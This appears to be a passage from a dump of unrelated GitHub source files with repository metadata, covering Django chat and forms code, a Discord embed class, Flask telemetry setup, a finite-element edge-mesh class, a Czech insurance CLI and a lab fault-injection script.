if chatrooms.exists():\n return createChatroom(success=False, id=-1)\n\n chatroom = ChatroomModel(user_from=user_from, user_to=user_to)\n chatroom.save()\n return createChatroom(success=True, id=chatroom.chatroom_id)\n\n\nclass leaveChatroom(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n username = graphene.String(required=True)\n\n def mutate(self, info, accessToken, username):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return leaveChatroom(success=False)\n\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n try:\n user_to = UserModel.objects.get(name=username)\n except:\n return leaveChatroom(success=False)\n\n if user_from == user_to:\n return leaveChatroom(success=False)\n\n try:\n chatroom = ChatroomModel.objects.get(user_from=user_from, user_to=user_to)\n except:\n try:\n chatroom = ChatroomModel.objects.get(user_from=user_to, user_to=user_from)\n except:\n return leaveChatroom(success=False)\n\n messages = MessageModel.objects.filter(chatroom_id=chatroom.chatroom_id).delete()\n chatroom.delete()\n return leaveChatroom(success=True)\n\n\nclass sendMessage(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n username = graphene.String(required=True)\n chatid = graphene.Int(required=True)\n msg = graphene.String(required=True)\n\n def mutate(self, info, accessToken, username, chatid, msg):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return sendMessage(success=False)\n\n me = UserModel.objects.get(kakaoID=kakaoID)\n try:\n you = UserModel.objects.get(name=username)\n except:\n return sendMessage(success=False)\n\n try:\n chatroom = ChatroomModel.objects.get(chatroom_id=chatid)\n if chatroom.user_from != me and chatroom.user_to != me:\n return sendMessage(success=False)\n if chatroom.user_from != you and chatroom.user_to != you:\n return sendMessage(success=False)\n except:\n return sendMessage(success=False)\n\n message = MessageModel(sender=me, chatroom_id=chatid, has_seen=False, text_message=msg)\n message.save()\n return sendMessage(success=True)\n\n\nclass deleteMessage(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n chatid = graphene.Int(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, chatid, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return deleteMessage(success=False)\n\n me = UserModel.objects.get(kakaoID=kakaoID)\n\n try:\n chatroom = ChatroomModel.objects.get(chatroom_id=chatid)\n if chatroom.user_from != me and chatroom.user_to != me:\n return deleteMessage(success=False)\n except:\n return deleteMessage(success=False)\n\n try:\n message = MessageModel.objects.get(sender=me, chatroom_id=chatid, message_id=record)\n except:\n return deleteMessage(success=False)\n\n message.delete()\n return deleteMessage(True)\n\n\nclass Mutation(graphene.ObjectType):\n create_user = CreateUser.Field()\n upload_profile = UploadProfile.Field()\n edit_profile = EditProfile.Field()\n add_post = AddPost.Field()\n edit_post = EditPost.Field()\n remove_post = RemovePost.Field()\n add_follow = addFollow.Field()\n un_follow = unFollow.Field()\n add_like = addLike.Field()\n un_like = unLike.Field()\n add_comment = addComment.Field()\n remove_comment = removeComment.Field()\n update_history_seen = updateHistorySeen.Field()\n deactivate_history = deactivateHistory.Field()\n get_history_detail = getHistoryDetail.Field()\n create_chatroom = createChatroom.Field()\n leave_chatroom = leaveChatroom.Field()\n send_message = sendMessage.Field()\n deleteMessage = deleteMessage.Field()\n\n\nschema = graphene.Schema(\n query=Query,\n mutation=Mutation\n)\n","repo_name":"onsoim/aintstagram","sub_path":"backend_api/code/backend_aintstagram/api/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":30824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17593861916","text":"# encoding: utf-8\n\"\"\"\nCollection of functions which can be used to extract metadata from file headers\n\"\"\"\n__author__ = \"Richard Smith\"\n__date__ = \"27 May 2021\"\n__copyright__ = \"Copyright 2018 United Kingdom Research and Innovation\"\n__license__ = \"BSD - see LICENSE file in top-level package directory\"\n__contact__ = \"richard.d.smith@stfc.ac.uk\"\n\nimport xarray as xr\nfrom xarray.backends.plugins import guess_engine\n\n\nclass XarrayBackend:\n \"\"\"\n Xarray\n ------\n\n Backend Name: ``Xarray``\n\n Description:\n Takes an input string and returns a boolean on whether this\n backend can open that file.\n \"\"\"\n\n def guess_can_open(self, filepath: str) -> bool:\n \"\"\"Return a boolean on whether this backend can open that file.\"\"\"\n try:\n self.engine = guess_engine(filepath)\n return True\n except ValueError:\n return False\n\n def attr_extraction(\n self, file: str, attributes: list, backend_kwargs: dict\n ) -> dict:\n \"\"\"\n Takes a filepath and list of attributes and extracts the metadata.\n\n :param file: file-like object\n :param attributes: attributes to extract\n :param kwargs: kwargs to send to xarray.open_dataset(). e.g. engine to\n specify different engines to use with grib data.\n\n :return: Dictionary of extracted attributes\n \"\"\"\n\n ds = xr.open_dataset(file, engine=self.engine, **backend_kwargs)\n\n extracted_metadata = {}\n for attr in attributes:\n\n value = ds.attrs.get(attr)\n if value:\n extracted_metadata[attr] = value\n\n return extracted_metadata\n","repo_name":"cedadev/stac-generator","sub_path":"stac_generator/plugins/extraction_methods/header/backends/xarray.py","file_name":"xarray.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40100699846","text":"from typing import List\nfrom bs4 import BeautifulSoup\nimport requests\nfrom . import pickaboo, gadstyle\n\n\necoms = [\n (pickaboo.domain, pickaboo.getProduct, pickaboo.searchProduct),\n (gadstyle.domain, gadstyle.getProduct, gadstyle.searchProduct),\n]\n\n\ndef getProduct(url) -> dict:\n url = url.replace(' ', '')\n # if(url.find(pickabooDomain) > 0):\n # return pickaboo(url)\n for ecom in ecoms:\n if(url.find(ecom[0]) > 0):\n return ecom[1](url)\n return None\n\n\ndef searchProduct(query) ->List[dict]:\n products = []\n for ecom in ecoms:\n products.extend(ecom[2](query))\n return products\n\n\nif __name__ == '__main__':\n # print(getProduct('https://www.pickaboo.com/redmi-note-11-6gb-128gb.html'))\n print(searchProduct('anker q30'))\n","repo_name":"nokla007/pricetracker_server","sub_path":"services/ecomService.py","file_name":"ecomService.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42062444122","text":"import logging\nimport logging.handlers\nimport os\nimport sys\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom opentelemetry import trace\nfrom opentelemetry.exporter.jaeger.thrift import JaegerExporter\nfrom opentelemetry.instrumentation.flask import FlaskInstrumentor\nfrom opentelemetry.instrumentation.pika import PikaInstrumentor\nfrom opentelemetry.instrumentation.requests import RequestsInstrumentor\nfrom opentelemetry.sdk.resources import Resource\nfrom opentelemetry.sdk.resources import SERVICE_NAME\nfrom opentelemetry.sdk.trace import TracerProvider\nfrom opentelemetry.sdk.trace.export import BatchSpanProcessor\n\nfrom app import api\nfrom config import ConfigClass # noqa\n\n\ndef create_app():\n \"\"\"Initialize and configure app.\"\"\"\n\n app = Flask(__name__)\n app.config.from_object(__name__ + '.ConfigClass')\n CORS(\n app,\n origins=\"*\",\n allow_headers=[\"Content-Type\", \"Authorization\", \"Access-Control-Allow-Credentials\"],\n supports_credentials=True,\n intercept_exceptions=False,\n )\n api.module_api.init_app(app)\n if not os.path.exists('./logs'):\n os.makedirs('./logs')\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handler = logging.FileHandler('./logs/queue.log')\n file_handler.setFormatter(formatter)\n app.logger.setLevel(logging.DEBUG)\n # Standard Out Handler\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(logging.DEBUG)\n # Standard Err Handler\n stderr_handler = logging.StreamHandler(sys.stderr)\n stderr_handler.setFormatter(formatter)\n stderr_handler.setLevel(logging.ERROR)\n\n app.logger.addHandler(file_handler)\n app.logger.addHandler(stdout_handler)\n app.logger.addHandler(stderr_handler)\n\n app.logger.info('start')\n\n return app\n\n\ndef instrument_app(app: Flask) -> None:\n \"\"\"Instrument the application with OpenTelemetry tracing.\"\"\"\n\n if ConfigClass.OPEN_TELEMETRY_ENABLED != \"TRUE\":\n return\n\n tracer_provider = TracerProvider(resource=Resource.create({SERVICE_NAME: ConfigClass.APP_NAME}))\n trace.set_tracer_provider(tracer_provider)\n\n FlaskInstrumentor().instrument_app(app)\n PikaInstrumentor().instrument()\n RequestsInstrumentor().instrument()\n\n jaeger_exporter = JaegerExporter(\n agent_host_name=ConfigClass.OPEN_TELEMETRY_HOST, agent_port=ConfigClass.OPEN_TELEMETRY_PORT\n )\n\n tracer_provider.add_span_processor(BatchSpanProcessor(jaeger_exporter))\n","repo_name":"vre-charite/service_queue","sub_path":"producer/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40710716364","text":"import numpy as np\n\nfrom scipy.sparse import csr_matrix\nfrom numpy.typing import NDArray\n\nfrom typing import Union\nfrom types import ModuleType\n\nfrom .mesh_base import Mesh, Plotable\nfrom .mesh_data_structure import Mesh1dDataStructure, HomogeneousMeshDS\n\nclass EdgeMeshDataStructure(Mesh1dDataStructure, HomogeneousMeshDS):\n def __init__(self, NN, cell):\n self.NN = NN\n self.cell = cell \n self.NC = len(cell)\n\n def construct(self) -> None: \n \"\"\"\n @brief 覆盖基类的 construct 函数\n \"\"\"\n return None\n\n def node_to_cell(self):\n NN = self.NN\n NC = self.NC\n I = self.cell.flat\n J = np.repeat(range(NC), 2)\n val = np.ones(2*NC, dtype=np.bool_)\n node2edge = csr_matrix((val, (I, J)), shape=(NN, NC))\n return node2edge\n\n face_to_cell = node_to_cell\n\n## @defgroup MeshGenerators Meshgeneration algorithms on commonly used domain \n## @defgroup MeshQuality\nclass EdgeMesh(Mesh, Plotable):\n def __init__(self, node, cell):\n self.node = node\n self.itype = cell.dtype\n self.ftype = node.dtype\n\n self.meshtype = 'edge'\n \n NN = len(node)\n self.ds = EdgeMeshDataStructure(NN, cell)\n\n self.nodedata = {}\n self.celldata = {}\n self.edgedata = self.celldata\n self.facedata = self.nodedata\n self.meshdata = {}\n\n self.cell_length = self.edge_length\n self.cell_tangent = self.edge_tangent\n self.cell_unit_tangent = self.edge_unit_tangent\n\n self.cell_to_ipoint = self.edge_to_ipoint\n self.face_to_ipoint = self.node_to_ipoint\n self.shape_function = self._shape_function\n\n def ref_cell_measure(self):\n return 1.0\n\n def ref_face_measure(self):\n return 0.0\n\n def integrator(self, q: int, etype: Union[str, int]='cell'):\n \"\"\"\n @brief 返回第 k 个高斯积分公式。\n \"\"\"\n from ..quadrature import GaussLegendreQuadrature\n return GaussLegendreQuadrature(q)\n\n def grad_shape_function(self, bc: NDArray, p: int=1, variables: str='x', index=np.s_[:]):\n \"\"\"\n @brief \n \"\"\"\n R = self._grad_shape_function(bc, p=p)\n if variables == 'x':\n Dlambda = self.grad_lambda(index=index)\n gphi = np.einsum('...ij, cjm->...cim', R, Dlambda)\n return gphi \n else:\n return R\n\n def entity_measure(self, etype: Union[int, str]='cell', index=np.s_[:], node=None):\n \"\"\"\n \"\"\"\n if etype in {1, 'cell', 'edge'}:\n return self.cell_length(index=index, node=None)\n elif etype in {0, 'face', 'node'}:\n return np.array([0.0], dtype=self.ftype)\n else:\n raise ValueError(f\"entity type: {etype} is wrong!\")\n\n def grad_lambda(self, index=np.s_[:]):\n \"\"\"\n @brief 计算所有单元上重心坐标函数的导数\n \"\"\"\n node = self.entity('node')\n cell = self.entity('cell', index=index)\n v = node[cell[:, 1]] - node[cell[:, 0]]\n NC = len(cell) \n GD = self.geo_dimension()\n Dlambda = np.zeros((NC, 2, GD), dtype=self.ftype)\n h2 = np.sum(v**2, axis=-1)\n v /=h2.reshape(-1, 1)\n Dlambda[:, 0, :] = -v\n Dlambda[:, 1, :] = v\n return Dlambda\n\n def number_of_local_ipoints(self, p: int, iptype: Union[int, str]='cell') -> int:\n return p + 1\n\n def number_of_global_ipoints(self, p: int) -> int:\n NN = self.number_of_nodes()\n NC = self.number_of_cells()\n return NN + (p-1)*NC\n\n def interpolation_points(self, p: int, index=np.s_[:]) -> NDArray:\n GD = self.geo_dimension()\n node = self.entity('node')\n\n if p == 1:\n return node\n else:\n NN = self.number_of_nodes()\n NC = self.number_of_cells()\n gdof = NN + NC*(p-1)\n ipoint = np.zeros((gdof, GD), dtype=self.ftype)\n ipoint[:NN] = node\n cell = self.entity('cell')\n w = np.zeros((p-1,2), dtype=np.float64)\n w[:,0] = np.arange(p-1, 0, -1)/p\n w[:,1] = w[-1::-1, 0]\n GD = self.geo_dimension()\n ipoint[NN:NN+(p-1)*NC] = np.einsum('ij, kj...->ki...', w,\n node[cell]).reshape(-1, GD)\n\n return ipoint\n\n def face_unit_normal(self, index=np.s_[:], node=None):\n \"\"\"\n @brief\n \"\"\"\n raise NotImplementedError\n\n def cell_normal(self, index=np.s_[:], node=None):\n \"\"\"\n @brief 单元的法线方向\n \"\"\"\n assert self.geo_dimension() == 2\n v = self.cell_tangent(index=index, node=node)\n w = np.array([(0, -1),(1, 0)])\n return v@w\n\n @classmethod\n def from_inp_file(cls, fname):\n from .inp_file_reader import InpFileReader\n\n reader = InpFileReader(fname)\n reader.parse()\n\n # 提取所需的数据\n parts = reader.parts\n\n # 从 parts 中获取 node 和 element 数据\n part_name = next(iter(parts)) # parts 的名称,需要根据 .inp 文件来选择正确的 parts 名称\n print(\"part_name:\", part_name)\n part_data = parts[part_name]\n print(\"part_data:\", part_data)\n node_data = part_data['node']\n print(\"node_date:\", node_data)\n node = node_data[0]\n node_index = node_data[-1]\n # print(\"node_index:\", node_index)\n element_data = part_data['elem']\n print(\"element_data:\", element_data)\n print(\"element_type:\", list(element_data.keys()))\n element_1 = element_data[list(element_data.keys())[0]]\n # print(\"element_1:\", element_1)\n element_2 = element_data[list(element_data.keys())[-1]]\n # print(\"element_2:\", element_2)\n cell = np.concatenate([data[0] for _, data in element_data.items()])\n mesh = cls(node, cell)\n\n nset_data = part_data['nset']\n print(\"nset_data:\", nset_data)\n print(\"nset_nset:\", list(nset_data.keys()))\n\n elset_data = part_data['elset']\n print(\"elset_data:\", elset_data)\n print(\"elset_elset:\", list(elset_data.keys()))\n\n orientation_data = part_data['orientation']\n print(\"orientation_data:\", orientation_data)\n print(\"orientation_name:\", list(orientation_data.keys()))\n\n solid_section_data = part_data['solid_section']\n print(\"solid_section_data:\", solid_section_data)\n print(\"solid_section_elset:\", list(solid_section_data.keys()))\n\n beam_section_data = part_data['beam_section']\n print(\"beam_section_data:\", beam_section_data)\n print(\"beam_section_elset:\", list(beam_section_data.keys()))\n\n assemblys = reader.assembly\n\n assembly_name = next(iter(assemblys)) # parts 的名称,需要根据 .inp 文件来选择正确的 parts 名称\n print(\"assembly_name:\", assembly_name)\n\n assembly_data = assemblys[assembly_name]\n print(\"assembly_data:\", assembly_data)\n\n instance_data = assembly_data['instance']\n print(\"instance_data:\", instance_data)\n print(\"instance_name:\", list(instance_data.keys()))\n\n nset_assembly_data = assembly_data['nset']\n print(\"nset_assembly_data:\", nset_assembly_data)\n print(\"nset_assembly_nset:\", list(nset_assembly_data.keys()))\n\n return mesh\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_triangle_mesh(cls, mesh):\n pass\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_tetrahedron_mesh(cls, mesh):\n pass\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_tower(cls):\n node = np.array([\n [-950, 0, 5080], [950, 0, 5080], [-950, 950, 2540], \n [950, 950, 2540], [950, -950, 2540], [-950, -950, 2540],\n [-2540, 2540, 0], [2540, 2540, 0], [2540, -2540, 0], \n [-2540, -2540, 0]], dtype=np.float64)\n cell = np.array([\n [0, 1], [3, 0], [1, 2], [1, 5], [0, 4], \n [1, 3], [1, 4], [0, 2], [0, 5], [2, 5],\n [4, 3], [2, 3], [4, 5], [2, 9], [6, 5], \n [8, 3], [7, 4], [6, 3], [2, 7], [9, 4],\n [8, 5], [9, 5], [2, 6], [7, 3], [8, 4]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n ## @ingroup MeshGenerators\n @classmethod\n def from_four_bar(cls):\n # 单位为 mm\n node = np.array([\n [0, 0], [400, 0], \n [400, 300], [0, 300]], dtype=np.float64)\n cell = np.array([\n [0, 1], [2, 1], \n [0, 2], [3, 2]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([0, 1, 3], dtype=np.int_), np.zeros(2))\n mesh.meshdata['force_bc'] = (np.array([1, 2], dtype=np.int_), \n np.array([[2e4, 0], [0, -2.5e4]], dtype=np.float64))\n\n return mesh \n\n ## @ingroup MeshGenerators\n @classmethod\n def from_balcony_truss(cls):\n # 单位为英寸 in\n node = np.array([\n [0, 0], [36, 0], \n [0, 36], [36, 36], [72, 36]], dtype=np.float64)\n cell = np.array([\n [0, 1], [1, 2], [2, 3],\n [1, 3], [1, 4], [3, 4]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([0, 2], dtype=np.int_), np.zeros(2))\n mesh.meshdata['force_bc'] = (np.array([3, 4], dtype=np.int_), np.array([[0, -500], [0, -500]]))\n\n return mesh \n\n ## @ingroup MeshGenerators\n @classmethod\n def from_simple_3d_truss(cls):\n # 单位为英寸 in\n node = np.array([\n [0, 0, 36], [72, 0, 0], \n [0, 0, -36], [0, 72, 0]], dtype=np.float64)\n cell = np.array([\n [0, 1], [0, 2], [0, 3],\n [1, 2], [1, 3], [2, 3]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_cantilever(cls):\n # 单位为 m\n node = np.array([\n [0], [5], [7.5]], dtype=np.float64)\n cell = np.array([\n [0, 1], [1, 2]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n\n ## @ingroup MeshGenerators\n @classmethod\n def from_three_beam(cls):\n # 单位为 m\n node = np.array([\n [0, 0.96], [1.44, 0.96], \n [0, 0], [1.44, 0]], dtype=np.float64)\n cell = np.array([\n [0, 1], [2, 0], [3, 1]], dtype=np.int_)\n mesh = cls(node, cell)\n\n mesh.meshdata['disp_bc'] = (np.array([6, 7, 8, 9], dtype=np.int_), np.zeros(3))\n mesh.meshdata['force_bc'] = (np.array([0, 1], dtype=np.int_), np.array([0, 900, 0]))\n\n return mesh \n\n\nEdgeMesh.set_ploter('1d')\n\n","repo_name":"weihuayi/fealpy","sub_path":"fealpy/mesh/edge_mesh.py","file_name":"edge_mesh.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"39262775607","text":"# -*- coding: utf-8 -*-\nimport pytz\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.forms.models import modelformset_factory, BaseModelFormSet\nfrom django.utils import timezone\nfrom booking.models import Course, Event\n\nfrom ..views.utils import get_current_courses, get_current_and_started_courses\n\nDATETIME_FORMAT = '%a %d %b %y, %H:%M'\n\ndef get_event_names():\n\n def callable():\n EVENT_CHOICES = [\n (\n event.id,\n f\"{event.name} - {event.start.astimezone(pytz.timezone('Europe/London')).strftime(DATETIME_FORMAT)}\"\n )\n for event in Event.objects.filter(start__gte=timezone.now()).order_by('start')]\n return tuple(EVENT_CHOICES)\n\n return callable\n\n\ndef get_course_names():\n\n def callable():\n def _course_start(course):\n if course.start:\n return f\"start {course.start.astimezone(pytz.timezone('Europe/London')).strftime(DATETIME_FORMAT)}\"\n return \"not started\"\n # exclude not started courses\n queryset = Course.objects.all()\n COURSE_CHOICES = [(course.id, f\"{course.name} - {_course_start(course)}\") for course in get_current_and_started_courses(queryset)]\n return tuple(COURSE_CHOICES)\n return callable\n\n\ndef get_students():\n\n def callable():\n return tuple(\n [\n (user.id, '{} {} ({})'.format(\n user.first_name, user.last_name, user.username\n )) for user in User.objects.all()\n ]\n )\n return callable\n\n\nclass UserFilterForm(forms.Form):\n\n events = forms.MultipleChoiceField(\n choices=get_event_names(),\n widget=forms.SelectMultiple(attrs={\"class\": \"form-control\"}),\n required=False,\n label=\"\"\n )\n\n courses = forms.MultipleChoiceField(\n choices=get_course_names(),\n widget=forms.SelectMultiple(attrs={\"class\": \"form-control\"}),\n required=False,\n label=\"\"\n )\n students = forms.MultipleChoiceField(\n choices=get_students(),\n widget=forms.SelectMultiple(attrs={\"class\": \"form-control\"}),\n required=False,\n label=\"\"\n )\n\n\nclass ChooseUsersBaseFormSet(BaseModelFormSet):\n\n def add_fields(self, form, index):\n super(ChooseUsersBaseFormSet, self).add_fields(form, index)\n\n form.fields['email_user'] = forms.BooleanField(\n widget=forms.CheckboxInput(),\n initial=True,\n required=False\n )\n\nChooseUsersFormSet = modelformset_factory(\n User,\n fields=('id',),\n formset=ChooseUsersBaseFormSet,\n extra=0,\n max_num=2000,\n can_delete=False)\n\n\nclass EmailUsersForm(forms.Form):\n subject = forms.CharField(max_length=255, required=True,\n widget=forms.TextInput(\n attrs={'class': 'form-control'}))\n from_address = forms.EmailField(max_length=255,\n initial=settings.DEFAULT_STUDIO_EMAIL,\n required=True,\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n help_text='This will be the reply-to address')\n cc = forms.BooleanField(\n widget=forms.CheckboxInput(),\n label=\"cc. from address\",\n initial=True,\n required=False\n )\n\n message = forms.CharField(widget=forms.Textarea(attrs={'class': 'form-control'}))\n","repo_name":"rebkwok/freedom_of_flight","sub_path":"studioadmin/forms/email_users_forms.py","file_name":"email_users_forms.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18334139827","text":"\"\"\"\nWrappers for Embed objects.\n\n.. currentmodule:: curious.dataclasses.embed\n\"\"\"\n\nimport datetime\n\nfrom curious.util import attrdict\n\n\nclass Attachment(attrdict):\n def __init__(self, **kwargs):\n self.id = int(kwargs.get(\"id\", 0))\n attrdict.__init__(self, **kwargs)\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __hash__(self):\n return hash(self.id)\n\n\nclass Embed(object): # not an IDObject! Embeds don't have IDs.\n \"\"\"\n Represents an Embed object on Discord.\n \"\"\"\n\n def __init__(self, *,\n title: str = None,\n description: str = None,\n colour: int = None,\n type_: str = None,\n url: str = None,\n timestamp: str = None,\n **kwargs):\n\n #: The title of this embed.\n self.title = title\n\n #: The description of this embed.\n self.description = description\n\n if colour is None:\n # for passing in from discord\n colour = kwargs.get(\"color\")\n\n #: The colour of this embed.\n self.colour = colour\n\n #: The type of this embed.\n self.type_ = type_\n\n #: The URL for this embed.\n self.url = url\n\n #: The timestamp for this embed.\n self.timestamp = timestamp # type: datetime.datetime\n\n #: The fields for this embed.\n self._fields = []\n\n #: The footer for this embed.\n self.footer = attrdict(**kwargs.get(\"footer\", {}))\n\n #: The author of this embed.\n self.author = attrdict(**kwargs.get(\"author\", {}))\n\n #: The image for this embed.\n self.image = attrdict(**kwargs.get(\"image\", {}))\n\n #: The video for this embed.\n self.video = attrdict(**kwargs.get(\"video\", {}))\n\n #: The thumbnail for this embed.\n self.thumbnail = attrdict(**kwargs.get(\"thumbnail\", {}))\n\n def add_field(self, *, name: str, value: str,\n inline: bool = True) -> 'Embed':\n \"\"\"\n Adds a field to the embed.\n\n :param name: The field name.\n :param value: The field value.\n :param inline: Is this field inline?\n :return: The Embed object.\n \"\"\"\n if isinstance(name, str) and len(name) == 0:\n raise ValueError(\"Name must not be empty\")\n\n if isinstance(value, str) and len(value) == 0:\n raise ValueError(\"Value must not be empty\")\n\n self._fields.append(attrdict({\"name\": name, \"value\": value, \"inline\": inline}))\n return self\n\n def set_author(self, *, name: str = None, url: str = None) -> 'Embed':\n \"\"\"\n Sets the author of this embed.\n\n :param name: The name of the author.\n :param url: The URL of the author.\n :return: The Embed object.\n \"\"\"\n\n self.author = attrdict()\n if name:\n self.author.name = name\n\n if url:\n self.author.url = url\n\n return self\n\n def set_footer(self, *, text: str = None, icon_url: str = None) -> 'Embed':\n \"\"\"\n Sets the footer of this embed.\n\n :param text: The footer text of this embed.\n :param icon_url: The icon URL for the footer.\n :return: The Embed object.\n \"\"\"\n self.footer = attrdict()\n if text:\n self.footer.text = text\n\n if icon_url:\n self.footer.icon_url = icon_url\n\n return self\n\n def set_image(self, *, image_url: str) -> 'Embed':\n \"\"\"\n Sets the image of this embed.\n\n :param image_url: The image URL of this embed.\n :return: The Embed object.\n \"\"\"\n self.image = attrdict()\n\n if not image_url.startswith(\"http\") or image_url.startswith(\"attachment://\"):\n raise ValueError(\"Image URLs must start with http[s]\")\n\n if image_url:\n self.image.image_url = image_url\n\n return self\n\n def set_thumbnail(self, *, url: str) -> 'Embed':\n \"\"\"\n Sets the thumbnail image of this embed.\n \n :param url: The image URL of this thumbnail. \n :return: The Embed object.\n \"\"\"\n self.thumbnail = attrdict()\n self.thumbnail.url = url\n\n return self\n\n def to_dict(self):\n \"\"\"\n Converts this embed into a flattened dict.\n \"\"\"\n payload = {\n \"type\": self.type_ if self.type_ else \"rich\"\n }\n\n if self.title:\n payload[\"title\"] = self.title\n\n if self.description:\n payload[\"description\"] = self.description\n\n if self.url:\n payload[\"url\"] = self.url\n\n if self.colour:\n payload[\"color\"] = self.colour # american spelling\n\n if self.timestamp:\n payload[\"timestamp\"] = self.timestamp.strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n\n # attrdicts can be automatically json dumped easily\n # so we just go and shove these right in there\n if self.footer:\n payload[\"footer\"] = self.footer\n\n if self.thumbnail:\n payload[\"thumbnail\"] = self.thumbnail\n\n if self.image:\n payload[\"image\"] = self.image\n\n if self.author:\n payload[\"author\"] = self.author\n\n payload[\"fields\"] = self._fields\n\n return payload\n","repo_name":"Tommy2016x/Discord-App","sub_path":"discord/venv1/Lib/site-packages/curious/dataclasses/embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10160130815","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom authentication.views import UserCreateView, TokenObtainPairView\nfrom authentication.views import create_post, get_user_data,create_post, like_post, unlike_post\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include('authentication.urls')),\n path('signup/', UserCreateView.as_view(), name='signup'),\n path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('posts/create/', create_post, name='create_post'),\n path('posts//like/', like_post, name='like_post'),\n path('posts//unlike/', unlike_post, name='unlike_post'),\n path('user/', get_user_data, name='get_user_data'),\n]\n","repo_name":"amnashafiqq/Social_Network_app","sub_path":"social_network_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3086504126","text":"def start(context, log, args):\n from fabric.api import settings\n\n node_name = args['node_name']\n process = args['process']\n signal = args.get('signal', 9)\n\n server = context.get_node_by_id(node_name)\n with settings(warn_only=True):\n res = server.exe('sudo pkill --signal {0} {1}'.format(signal, process))\n\n log.info('Killing process={0} on server={1}. result={2}'.format(process, node_name, res.return_code))\n","repo_name":"CiscoSystems/os-sqe","sub_path":"lab/disruptors/pkill.py","file_name":"pkill.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10375629471","text":"from akce import *\nfrom pojistenci import *\nimport os\n\nprint(\"\"\"\n-----------------------------------\nEVIDENCE POJISTENYCH\n-----------------------------------\n\"\"\")\n\nvyber_akce = True\nwhile vyber_akce:\n print(akce)\n vyberte_operaci = kontrola(\"Zadejte cislo akce: \", \"Zadejte prosim cislo 1 az 6. \")\n os.system('cls')\n if vyberte_operaci == 1:\n pokracuj = True\n while pokracuj:\n evidence_pojistenych()\n pokracuj = False\n\n elif vyberte_operaci == 2:\n if overeni_prazdneho_pole():\n for seznam in seznam_pojistenych:\n print(seznam.__str__())\n\n elif vyberte_operaci == 3:\n if overeni_prazdneho_pole():\n hledani_pojistenych()\n\n elif vyberte_operaci == 4:\n if overeni_prazdneho_pole():\n editace_pojistenych()\n\n elif vyberte_operaci == 5:\n if overeni_prazdneho_pole():\n smazani_pojistenych()\n\n elif vyberte_operaci == 6:\n vyber_akce = False\n input(\"Program byl ukoncen. Stisknete libovolnou klavesu...\")\n\n else:\n print(\"Zadejte prosim cislo 1 az 6. \")\n \n \n\n","repo_name":"mtruhlar/evidence_pojisteni","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42179050182","text":"#!/usr/bin/python3\n\n\ndef safe_print_list_integers(my_list=[], x=0):\n\n index = 0\n for i in range(x):\n try:\n index += 